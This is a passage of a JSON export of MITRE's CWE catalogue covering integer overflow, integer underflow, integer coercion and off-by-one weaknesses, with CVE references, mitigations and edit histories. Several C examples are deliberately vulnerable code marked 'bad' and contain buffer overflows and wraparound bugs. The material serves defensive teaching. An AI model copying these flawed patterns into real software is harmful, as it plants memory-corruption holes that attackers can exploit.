use-after-free","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2753"},{"Reference":"CVE-2005-1513","Description":"Chain: integer overflow in securely-coded mail program leads to buffer overflow. In 2005, this was regarded as unrealistic to exploit, but in 2020, it was rediscovered to be easier to exploit due to evolutions of the technology.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1513"},{"Reference":"CVE-2002-0391","Description":"Integer overflow via a large number of arguments.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0391"},{"Reference":"CVE-2002-0639","Description":"Integer overflow in OpenSSH as listed in the demonstrative examples.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0639"},{"Reference":"CVE-2005-1141","Description":"Image with large width and height leads to integer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1141"},{"Reference":"CVE-2005-0102","Description":"Length value of -1 leads to allocation of 0 bytes and resultant heap overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0102"},{"Reference":"CVE-2004-2013","Description":"Length value of -1 leads to allocation of 0 bytes and resultant heap overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2013"},{"Reference":"CVE-2017-1000121","Description":"chain: unchecked message size metadata allows integer overflow (CWE-190) leading to buffer overflow (CWE-119).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000121"},{"Reference":"CVE-2013-1591","Description":"Chain: an integer overflow (CWE-190) in the image size calculation causes an infinite loop (CWE-835) which sequentially allocates buffers without limits (CWE-1325) until the stack is full.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1591"}]},"Functional_Areas":{"Functional_Area":["Number Processing","Memory Management","Counters"]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Integer overflow (wrap or wraparound)"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Integer Overflow"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Integer overflow"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT18-C","Entry_Name":"Evaluate integer expressions in a larger size before comparing or assigning to that size","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT30-C","Entry_Name":"Ensure that unsigned integer operations do not wrap","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT32-C","Entry_Name":"Ensure that operations on signed integers do not result in overflow","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT35-C","Entry_Name":"Evaluate integer expressions in a larger size before comparing or assigning to that size"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM07-C","Entry_Name":"Ensure that the arguments to calloc(), when multiplied, do not wrap","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM35-C","Entry_Name":"Allocate sufficient memory for an object"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":3,"Entry_Name":"Integer Overflows"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"92"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-145"}},{"attr":{"@_External_Reference_ID":"REF-146"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 20, &#34;Integer Overflows&#34; Page 620"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 7: Integer Overflows.&#34; Page 119"}},{"attr":{"@_External_Reference_ID":"REF-106"}},{"attr":{"@_External_Reference_ID":"REF-150"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Signed Integer Boundaries&#34;, Page 220"}}]},"Notes":{"Note":[{"#text":"Integer overflows can be primary to buffer overflows.","attr":{"@_Type":"Relationship"}},{"#text":"\\"Integer overflow\\" is sometimes used to cover several types of errors, including signedness errors, or buffer overflows that involve manipulation of integer data types instead of characters. Part of the confusion results from the fact that 0xffffffff is -1 in a signed context. Other confusion also arises because of the role that integer overflows have in chains.","attr":{"@_Type":"Terminology"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Relationship_Notes, Taxonomy_Mappings, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Common_Consequences, Description, Potential_Mitigations, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Detection_Factors, Functional_Areas, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Functional_Areas, Observed_Examples, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Integer Overflow (Wrap or Wraparound)","attr":{"@_Date":"2009-01-12"}}}},"191":{"attr":{"@_ID":"191","@_Name":"Integer Underflow (Wrap or Wraparound)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product subtracts one value from another, such that the result is less than the minimum allowable integer value, which produces a value that is not equal to the correct result.","Extended_Description":"This can happen in signed and unsigned cases.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Integer underflow","Description":{"xhtml:p":["\\"Integer underflow\\" is sometimes used to identify signedness errors in which an originally positive number becomes negative as a result of subtraction. However, there are cases of bad subtraction in which unsigned integers are involved, so it\'s not always a signedness issue.","\\"Integer underflow\\" is occasionally used to describe array index errors in which the index is negative."]}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Instability"],"Note":"This weakness will generally lead to undefined behavior and therefore crashes. In the case of overflows involving loop index variables, the likelihood of infinite loops is also high."},{"Scope":"Integrity","Impact":"Modify Memory","Note":"If the value in question is important to data (as opposed to flow), simple data corruption has occurred. Also, if the wrap around results in other conditions such as buffer overflows, further memory corruption may occur."},{"Scope":["Confidentiality","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism"],"Note":"This weakness can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program\'s implicit security policy."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example subtracts from a 32 bit signed integer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include &lt;stdio.h&gt;#include &lt;stdbool.h&gt;main (void){}","xhtml:br":["","","",""],"xhtml:div":{"#text":"int i;i = -2147483648;i = i - 1;return 0;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},"Body_Text":"The example has an integer underflow. The value of i is already at the lowest negative value possible, so after subtracting 1, the new value of i is 2147483647."},{"attr":{"@_Demonstrative_Example_ID":"DX-137"},"Intro_Text":"This code performs a stack allocation based on a length calculation.","Example_Code":{"#text":"}","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int a = 5, b = 6;size_t len = a - b;char buf[len];    // Just blows up the stack","xhtml:br":["",""]}},"Body_Text":["Since a and b are declared as signed ints, the \\"a - b\\" subtraction gives a negative result (-1). However, since len is declared to be unsigned, len is cast to an extremely large positive number (on 32-bit systems - 4294967295). As a result, the buffer buf[len] declaration uses an extremely large size to allocate on the stack, very likely more than the entire computer\'s memory space.","Miscalculations usually will not be so obvious. The calculation will either be complicated or the result of an attacker\'s input to attain the negative value."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0816","Description":"Integer underflow in firewall via malformed packet.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0816"},{"Reference":"CVE-2004-1002","Description":"Integer underflow by packet with invalid length.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1002"},{"Reference":"CVE-2005-0199","Description":"Long input causes incorrect length calculation.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0199"},{"Reference":"CVE-2005-1891","Description":"Malformed icon causes integer underflow in loop counter variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1891"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Integer underflow (wrap or wraparound)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT30-C","Entry_Name":"Ensure that unsigned integer operations do not wrap","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT32-C","Entry_Name":"Ensure that operations on signed integers do not result in overflow","Mapping_Fit":"Imprecise"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 7: Integer Overflows.&#34; Page 119"}}},"Notes":{"Note":{"#text":"Under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Demonstrative_Example"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"192":{"attr":{"@_ID":"192","@_Name":"Integer Coercion Error","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Integer coercion refers to a set of flaws pertaining to the type casting, extension, or truncation of primitive data types.","Extended_Description":"Several flaws fall under the category of integer coercion errors. For the most part, these errors in and of themselves result only in availability and data integrity issues. However, in some circumstances, they may result in other, more complicated security related flaws, such as buffer overflow conditions.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Crash, Exit, or Restart"],"Note":"Integer coercion often leads to undefined states of execution resulting in infinite loops or crashes."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"In some cases, integer coercion errors can lead to exploitable buffer overflow conditions, resulting in the execution of arbitrary code."},{"Scope":["Integrity","Other"],"Impact":"Other","Note":"Integer coercion errors result in an incorrect value being stored for the variable in question."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"A language which throws exceptions on ambiguous data casts might be chosen."},{"Phase":"Architecture and Design","Description":"Design objects and program flow such that multiple or complex casts are unnecessary"},{"Phase":"Implementation","Description":"Ensure that any data type casting that you must used is entirely understood in order to reduce the plausibility of error in use."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-21"},"Intro_Text":"The following code is intended to read an incoming packet from a socket and extract one or more headers.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"DataPacket *packet;int numHeaders;PacketHeader *headers;sock=AcceptSocketConnection();ReadPacket(packet, sock);numHeaders =packet-&gt;headers;if (numHeaders &gt; 100) {}headers = malloc(numHeaders * sizeof(PacketHeader);ParsePacketHeaders(packet, headers);","xhtml:br":["","","","","","","","","",""],"xhtml:div":{"#text":"ExitError(\\"too many headers!\\");","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"The code performs a check to make sure that the packet does not contain too many headers. However, numHeaders is defined as a signed int, so it could be negative. If the incoming packet specifies a value such as -3, then the malloc calculation will generate a negative number (say, -300 if each header can be a maximum of 100 bytes). When this result is provided to malloc(), it is first converted to a size_t type. This conversion then produces a large value such as 4294966996, which may cause malloc() to fail or to allocate an extremely large amount of memory (CWE-195). With the appropriate negative numbers, an attacker could trick malloc() into using a very small positive number, which then allocates a buffer that is much smaller than expected, potentially leading to a buffer overflow."},{"attr":{"@_Demonstrative_Example_ID":"DX-23"},"Intro_Text":"The following code reads a maximum size and performs validation on that size. It then performs a strncpy, assuming it will not exceed the boundaries of the array. While the use of \\"short s\\" is forced in this particular example, short int\'s are frequently used within real-world code, such as code that processes structured data.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int GetUntrustedInt () {}void main (int argc, char **argv) {}","xhtml:div":[{"#text":"return(0x0000FFFF);","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char path[256];char *input;int i;short s;unsigned int sz;i = GetUntrustedInt();s = i;/* s is -1 so it passes the safety check - CWE-697 */if (s &gt; 256) {}/* s is sign-extended and saved in sz */sz = s;/* output: i=65535, s=-1, sz=4294967295 - your mileage may vary */printf(\\"i=%d, s=%d, sz=%u\\\\n\\", i, s, sz);input = GetUserInput(\\"Enter pathname:\\");/* strncpy interprets s as unsigned int, so it\'s treated as MAX_INT(CWE-195), enabling buffer overflow (CWE-119) */strncpy(path, input, s);path[255] = \'\\\\0\'; /* don\'t want CWE-170 */printf(\\"Path is: %s\\\\n\\", path);","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","",""],"xhtml:div":{"#text":"DiePainfully(\\"go away!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}}}}],"xhtml:br":["",""]}},"Body_Text":"This code first exhibits an example of CWE-839, allowing \\"s\\" to be a negative number. When the negative short \\"s\\" is converted to an unsigned integer, it becomes an extremely large positive integer. When this converted integer is used by strncpy() it will lead to a buffer overflow (CWE-119)."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Integer coercion error"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT02-C","Entry_Name":"Understand integer conversion rules"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT05-C","Entry_Name":"Do not use input functions to convert character data if they cannot handle all possible inputs"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT31-C","Entry_Name":"Ensure that integer conversions do not result in lost or misinterpreted data","Mapping_Fit":"Exact"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 7: Integer Overflows.&#34; Page 119"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Sign Extension&#34;, Page 248"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":{"#text":"Within C, it might be that \\"coercion\\" is semantically different than \\"casting\\", possibly depending on whether the programmer directly specifies the conversion, or if the compiler does it implicitly. This has implications for the presentation of this entry and others, such as CWE-681, and whether there is enough of a difference for these entries to be split.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Maintenance_Notes, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Maintenance_Notes, References"}]}},"193":{"attr":{"@_ID":"193","@_Name":"Off-by-one Error","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A product calculates or uses an incorrect maximum or minimum value that is 1 more, or 1 less, than the correct value.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"617","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"170","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"off-by-five","Description":"An \\"off-by-five\\" error was reported for sudo in 2002 (CVE-2002-0184), but that is more like a \\"length calculation\\" error."}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Instability"],"Note":"This weakness will generally lead to undefined behavior and therefore crashes. In the case of overflows involving loop index variables, the likelihood of infinite loops is also high."},{"Scope":"Integrity","Impact":"Modify Memory","Note":"If the value in question is important to data (as opposed to flow), simple data corruption has occurred. Also, if the wrap around results in other conditions such as buffer overflows, further memory corruption may occur."},{"Scope":["Confidentiality","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism"],"Note":"This weakness can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program\'s implicit security policy."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"When copying character arrays or using character manipulation methods, the correct size parameter must be used to account for the null terminator that needs to be added at the end of the array. Some examples of functions susceptible to this weakness in C include strcpy(), strncpy(), strcat(), strncat(), printf(), sprintf(), scanf() and sscanf()."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-20"},"Intro_Text":"The following code allocates memory for a maximum number of widgets. It then gets a user-specified number of widgets, making sure that the user does not request too many. It then initializes the elements of the array using InitializeWidget(). Because the number of widgets can vary for each request, the code inserts a NULL pointer to signify the location of the last widget.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int i;unsigned int numWidgets;Widget **WidgetList;numWidgets = GetUntrustedSizeValue();if ((numWidgets == 0) || (numWidgets &gt; MAX_NUM_WIDGETS)) {}WidgetList = (Widget **)malloc(numWidgets * sizeof(Widget *));printf(\\"WidgetList ptr=%p\\\\n\\", WidgetList);for(i=0; i&lt;numWidgets; i++) {}WidgetList[numWidgets] = NULL;showWidgets(WidgetList);","xhtml:br":["","","","","","","","","",""],"xhtml:div":[{"#text":"ExitError(\\"Incorrect number of widgets requested!\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"WidgetList[i] = InitializeWidget();","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"However, this code contains an off-by-one calculation error (CWE-193). It allocates exactly enough space to contain the specified number of widgets, but it does not include the space for the NULL pointer. As a result, the allocated buffer is smaller than it is supposed to be (CWE-131). So if the user ever requests MAX_NUM_WIDGETS, there is an out-of-bounds write (CWE-787) when the NULL is assigned. Depending on the environment and compilation settings, this could cause memory corruption."},{"Intro_Text":"In this example, the code does not account for the terminating null character, and it writes one byte beyond the end of the buffer.","Body_Text":["The first call to strncat() appends up to 20 characters plus a terminating null character to fullname[]. There is plenty of allocated space for this, and there is no weakness associated with this first call. However, the second call to strncat() potentially appends another 20 characters. The code does not account for the terminating null character that is automatically added by strncat(). This terminating null character would be written one byte beyond the end of the fullname[] buffer. Therefore an off-by-one error exists with the second strncat() call, as the third argument should be 19.","When using a function like strncat() one must leave a free byte at the end of the buffer for a terminating null character, thus avoiding the off-by-one weakness. Additionally, the last argument to strncat() is the number of characters to append, which must be less than the remaining space in the buffer. Be careful not to just use the total size of the buffer."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char firstname[20];char lastname[20];char fullname[40];fullname[0] = \'\\\\0\';strncat(fullname, firstname, 20);strncat(fullname, lastname, 20);","xhtml:br":["","","","","","",""]}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"char firstname[20];char lastname[20];char fullname[40];fullname[0] = \'\\\\0\';strncat(fullname, firstname, sizeof(fullname)-strlen(fullname)-1);strncat(fullname, lastname, sizeof(fullname)-strlen(fullname)-1);","xhtml:br":["","","","","","",""]}}]},{"Intro_Text":"The Off-by-one error can also be manifested when reading characters from a character array within a for loop that has an incorrect continuation condition.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define PATH_SIZE 60char filename[PATH_SIZE];for(i=0; i&lt;=PATH_SIZE; i++) {}","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char c = getc();if (c == \'EOF\') {}filename[i] = getc();","xhtml:br":["","",""],"xhtml:div":{"#text":"filename[i] = \'\\\\0\';","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"for(i=0; i&lt;PATH_SIZE; i++) {...","xhtml:br":""}}],"Body_Text":"In this case, the correct continuation condition is shown below."},{"Intro_Text":"As another example the Off-by-one error can occur when using the sprintf library function to copy a string variable to a formatted string variable and the original string variable comes from an untrusted source. As in the following example where a local function, setFilename is used to store the value of a filename to a database but first uses sprintf to format the filename. The setFilename function includes an input parameter with the name of the file that is used as the copy source in the sprintf function. The sprintf function will copy the file name to a char array of size 20 and specifies the format of the new variable as 16 characters followed by the file extension .dat.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int setFilename(char *filename) 